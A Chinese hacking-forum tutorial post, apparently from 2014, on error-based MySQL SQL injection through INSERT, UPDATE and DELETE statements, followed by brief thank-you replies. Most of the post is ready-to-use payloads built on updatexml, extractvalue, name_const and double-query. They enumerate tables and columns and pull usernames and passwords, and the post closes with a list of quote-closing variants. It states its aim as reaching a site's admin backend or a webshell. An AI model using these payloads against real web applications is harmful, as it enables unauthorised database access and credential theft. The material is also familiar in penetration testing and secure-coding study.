查看: 9762|回复: 3

抛开select利用insert,update和delete注入

[复制链接]
  • TA的每日心情
    奋斗
    2021-12-29 18:17
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2014-7-13 13:11:31 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or '', 'Nervo'); 
    ERROR 1060 (42S21): Duplicate column name 'users' 
    
    
    为了获得后台或者直接得到webshell  我们会利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insert、update、delete语句的注射点时(比如有的网站会记录用户浏览记录,包括referer、client_ip、user-agent等,还有类似于用户注册、密码修改、信息删除等功能),还可以用如上方法获取我们需要的数据吗?在这里,我们以MYSQL的显错为例,看一下如何在insert、update、delete的注射点中获取我们想要的数据。

    为了更好的演示注射效果,我们先利用下面的语句创建原始数据:


    [SQL] 纯文本查看 复制代码
    create database newdb;
     use newdb;
     create table users(
     id int(3) not null auto_increment,
     username varchar(20) not null,
     password varchar(20) not null,
     primary key (id)
     );
     insert into users values(1,'Jane','Eyre');
    





    看一下当前数据结构:



    因为我们这里是用的显错模式,所以思路就是在insert、update、delete语句中人为构造语法错误,利用如下语句:

    [SQL] 纯文本查看 复制代码
    insert into users (id, username, password) values (2,''inject here'','Olivia');
     insert into users (id, username, password) values (2,""inject here"",'Olivia'); 





    注意:大家看到本来是要填入username字段的地方,我们填了'inject here'和”inject here”两个字段来实现爆错,一个是单引号包含、一个是双引号包含,要根据实际的注入点灵活构造。


    updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。

    payload:


    or updatexml(1,concat(0x7e,(version())),0) or

    Insert:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');



    Update:

    UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2 and username='Olivia';


    Delete:

    DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';

    提取数据:
    由于篇幅有限,在insert、update、delete用法一致的时候,我会仅以insert为例说明。

    所用的payload为:
    [SQL] 纯文本查看 复制代码
    or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or 
    

    获取newdb数据库表名:


    获取users表的列名:



    利用insert获取users表的数据:


    利用delete获取users表的数据:



    我们可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据:


    在这里,为了演示用update获取数据,我们临时再创建一个含有id,name,address的students表,并插入一条数据:



    再次利用update获取users表的数据:




    如果你碰到一个update的注入并且想获取当前表的数据的话,可用用双查询,我后面会讲到。



    extractvalue()函数也是MYSQL对XML文档数据进行查询和修改的XPATH函数。

    payload:


    or extractvalue(1,concat(0x7e,database())) or

    Insert:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,database())) or'', 'Nervo');


    update:


    UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Nervo';


    delete:


    DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or'';


    提取数据:
    同样,在insert、update、delete用法一致的时候,我会仅以insert为例说明。

    获取newdb数据库表名:


    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 1,1))) or'', 'Nervo');


    获取users表的列名:


    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1))) or'', 'Nervo');


    获取users表的数据:


    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1))) or '', 'Nervo');


    同样,我们可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据。




    name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时 , NAME_CONST() 促使该列使用给定名称。


    [AppleScript] 纯文本查看 复制代码
    Payload:
    
    
    or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or
     
    Insert:
    
    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '','Nervo'); 
    
    update:
    
    UPDATE users SET password='Nicky' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Nervo'; 
    
    delete:
    
    DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a)or ''; 


    提取数据:
    在最新的MYSQL版本中,使用name_const()函数只能提取到数据库的版本信息。但是在一些比较旧的高于5.0.12(包括5.0.12)的MYSQL版本中,可以进一步提取更多数据。在这里我使用MySQL5.0.45进行演示。

    首先,我们做一个简单的SELECT查询,检查我们是否可以提取数据。

    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo'); 


    如果显示ERROR 1210 (HY000): Incorrect arguments to NAME_CONST,那就洗洗睡吧。。
    如果显示ERROR 1060 (42S21): Duplicate column name '2',就可以进一步获取更多数据。

    获取newdb数据库表名:
    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or '', 'Nervo'); 
    ERROR 1060 (42S21): Duplicate column name 'users' 




    获取users表的列名:

    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a) or '', 'Nervo'); 
    ERROR 1060 (42S21): Duplicate column name 'id' 
    

    获取users表的数据:

    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit
     0,1),1))a) or '', 'Nervo'); 
    ERROR 1060 (42S21): Duplicate column name '1~Jane~Eyre' 



    利用子查询注入的原理与select查询时的显错注入一致。
    Insert:


    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Nervo');
    
    


    update:


    [AppleScript] 纯文本查看 复制代码
    UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo'; 
    


    delete:


    [AppleScript] 纯文本查看 复制代码
    DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ; 
    


    提取数据:
    获取newdb数据库表名:



    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '','Nervo'); 
    


    获取users表的列名:


    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo'); 



    获取users表的数据:


    [AppleScript] 纯文本查看 复制代码
    INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo'); 




    更多闭合变种

    ' or (payload) or '
    ' and (payload) and '
    ' or (payload) and '
    ' or (payload) and '='
    '* (payload) *'
    ' or (payload) and '
    " – (payload) – "



    注:文章部分引用来自

    http://lliiii.com                              

    http://dev.mysql.com/

    http://websec.ca/kb/sql_injection


    评分

    参与人数 2i币 +26 收起 理由
    小雨 + 10
    管理01 + 16

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2015-7-10 07:02
  • 签到天数: 49 天

    [LV.5]常住居民I

    发表于 2014-7-13 17:23:47 | 显示全部楼层
    谢谢分享~        
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2014-7-13 22:32:16 | 显示全部楼层
    xpath                                        .
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-7-25 18:30:08 | 显示全部楼层
    高大上的感觉啊
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-27 10:14 , Processed in 0.026411 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部